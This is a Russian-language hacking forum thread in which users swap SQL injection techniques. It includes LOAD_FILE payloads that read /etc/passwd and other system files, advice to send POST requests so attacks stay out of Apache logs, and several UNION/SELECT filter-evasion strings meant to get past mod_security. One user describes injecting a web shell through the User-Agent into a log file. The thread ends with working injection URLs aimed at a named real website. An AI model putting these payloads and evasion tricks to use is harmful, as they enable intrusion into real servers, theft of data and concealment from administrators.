Ваши вопросы по уязвимостям.

mr.celt:

1) спасиб, запомню
2) лимит всегда ставлю, на всякий случай, чтобы по ошибке слишком много данных не получить
он тут не помеха

3) получилось вытащить файл /etc/hosts )
а этот /etc/issue не сумел....
значить права есть

4) запросы post. Это что то меняет?
и как долго данные в error.log и access.log хранятся?

 

zuzzz

Про POST-запросы. Может окажусь неточным, если что - поправьте. Если передавать запросы методом GET, то все отлично ложится в access.log данного сайта, включая всякие там UNION SELECT LOAD_FILES ... и т.д. При желании поиска методов взлома админ легким grep-ом найдет все запросы и поймет, где у него проблемы.
А если передавать данные методом POST, то все параметры ложаться в тело запроса и при "стандартной" настройке apache в логи не попадают или становятся менее заметными.

Про время хранения, это все индивидуально и зависит от настроек сервера. Я встречал сервера, где access.log и error.log заново начинались каждую неделю, а все остальные удалялись.

 

при post в log будет запись вида
...bla.php
а при get
...bla.php?id=123 where 1=2 union select LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
т.е. паливо, отлично видимое невооруженным взглядом

как хранятся error.log и access.log зависит наверное и от настроке конкретного сервера/сайта, но те, что мне попадались - почти всегда, насколько помню, хранятся "вечно" - просто старые переносятся в архив. вопрос в том как часто туда заглядывает админ. на многих сайтах, такое впечатление, что вообще никогда

 

В случае наличия на сервере mod_security то и пост запросы будут в логах

 

Кто подскажет что делать если стоит фильтрация UNION или SELECT??

 

+union+/*!select*/+0,1,2....
+UniOn+SeLecT+0,1,2....
+Union+Select+0,1,2....
+/*!union*/+/*!select*/+0,1,2....

 

если стоит mod_security то "обыкновенные" конструкции sql inj

Code:

... union select ...

вроде как работать не будут ?

 

Какие еще есть способы?

 

...+uniunionon+seleselectct...
глупо так гадать, зависит от того, какой фильтр.

 

Если фильтрация действует, когда union и select вместе, тогда используй подзапросы.

 

union+%53%45%4C%45%43%54

 

еще мессаг~10 примерно, и мы таки придем к тому, что надо выложить сцыку и уже не страдать ерундой, мда. Придлагаю внести в правила

 

отличное правило)))

P.S. там ещё mod_rewrite может быть)

 

Нет слов.

Выкладывайте ссылку, а то гадать нету резона, да ещё и непонятно какая фильтрация, либо по типу preg_match, или по типу preg_replace.

 

что не так?

 

2 pinch

%53%45%4C%45%43%54=select ?

 

Здравствуйте уважаемые форумчане.
Есть небольшой вопросик.
Можно ли использовать лог напрямую, а не черeз ../../../proc/self/fd/{0-9} ?
Просто на одном сайте у меня кроме /etc/passwd ничего не открывалось, я начал искать лог напрямую, через конфиг апача /etc/httpd/config/httpd.conf нашел пути до файла логов, и вывел его напрямую. Нашел ошибку и попытался через юзерагент залить шел.
Потом просто перестал открываться лог. Возможно я по неопытности запорол. Возможно system() было запрещено. Или же вся проблемы что с этим логом не получиться залить впринципе?

 

да

 

http://www.worstpreviews.com/review.php?id=-1+UniOn+all+SelEct+1,2,3,4,5,6,7,8,9,10,11,12--

 

можно и этот
http://www.worstpreviews.com/review.php?id=-1+UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+